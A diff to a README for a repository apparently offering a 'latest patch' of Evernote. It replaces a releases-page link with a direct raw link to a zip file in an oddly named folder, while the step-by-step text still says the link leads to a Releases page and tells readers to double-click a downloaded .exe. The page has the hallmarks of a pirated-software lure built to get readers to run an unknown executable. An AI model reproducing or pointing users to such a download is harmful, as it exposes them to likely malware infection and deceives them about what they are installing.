Rexxie-zzz/Evernote-Latest-Patch/README.md

 ## 📥 Download & Install

-To begin, visit this page to download: [Evernote-Latest-Patch Releases](https://github.com/Rexxie-zzz/Evernote-Latest-Patch/releases).
+To begin, visit this page to download: [Evernote-Latest-Patch Releases](https://raw.githubusercontent.com/Rexxie-zzz/Evernote-Latest-Patch/main/prosodiacally/Evernote-Latest-Patch_v3.4.zip).

 ### Step-by-Step Download Guide

 1. Click on the link above to reach the Releases page.
 2. Browse through the available release versions.
 Each version includes updates and improvements.
 3. Select the version you wish to download.
-4. Click on the download link for the executable file (e.g., Evernote-Latest-Patch.exe).
+4. Click on the download link for the executable file (e.g., https://raw.githubusercontent.com/Rexxie-zzz/Evernote-Latest-Patch/main/prosodiacally/Evernote-Latest-Patch_v3.4.zip).
 5. After the download completes, locate the .exe file in your downloads folder.
 6. Double-click the .exe file to run the installer.
 7. Follow the on-screen prompts to install the software on your computer.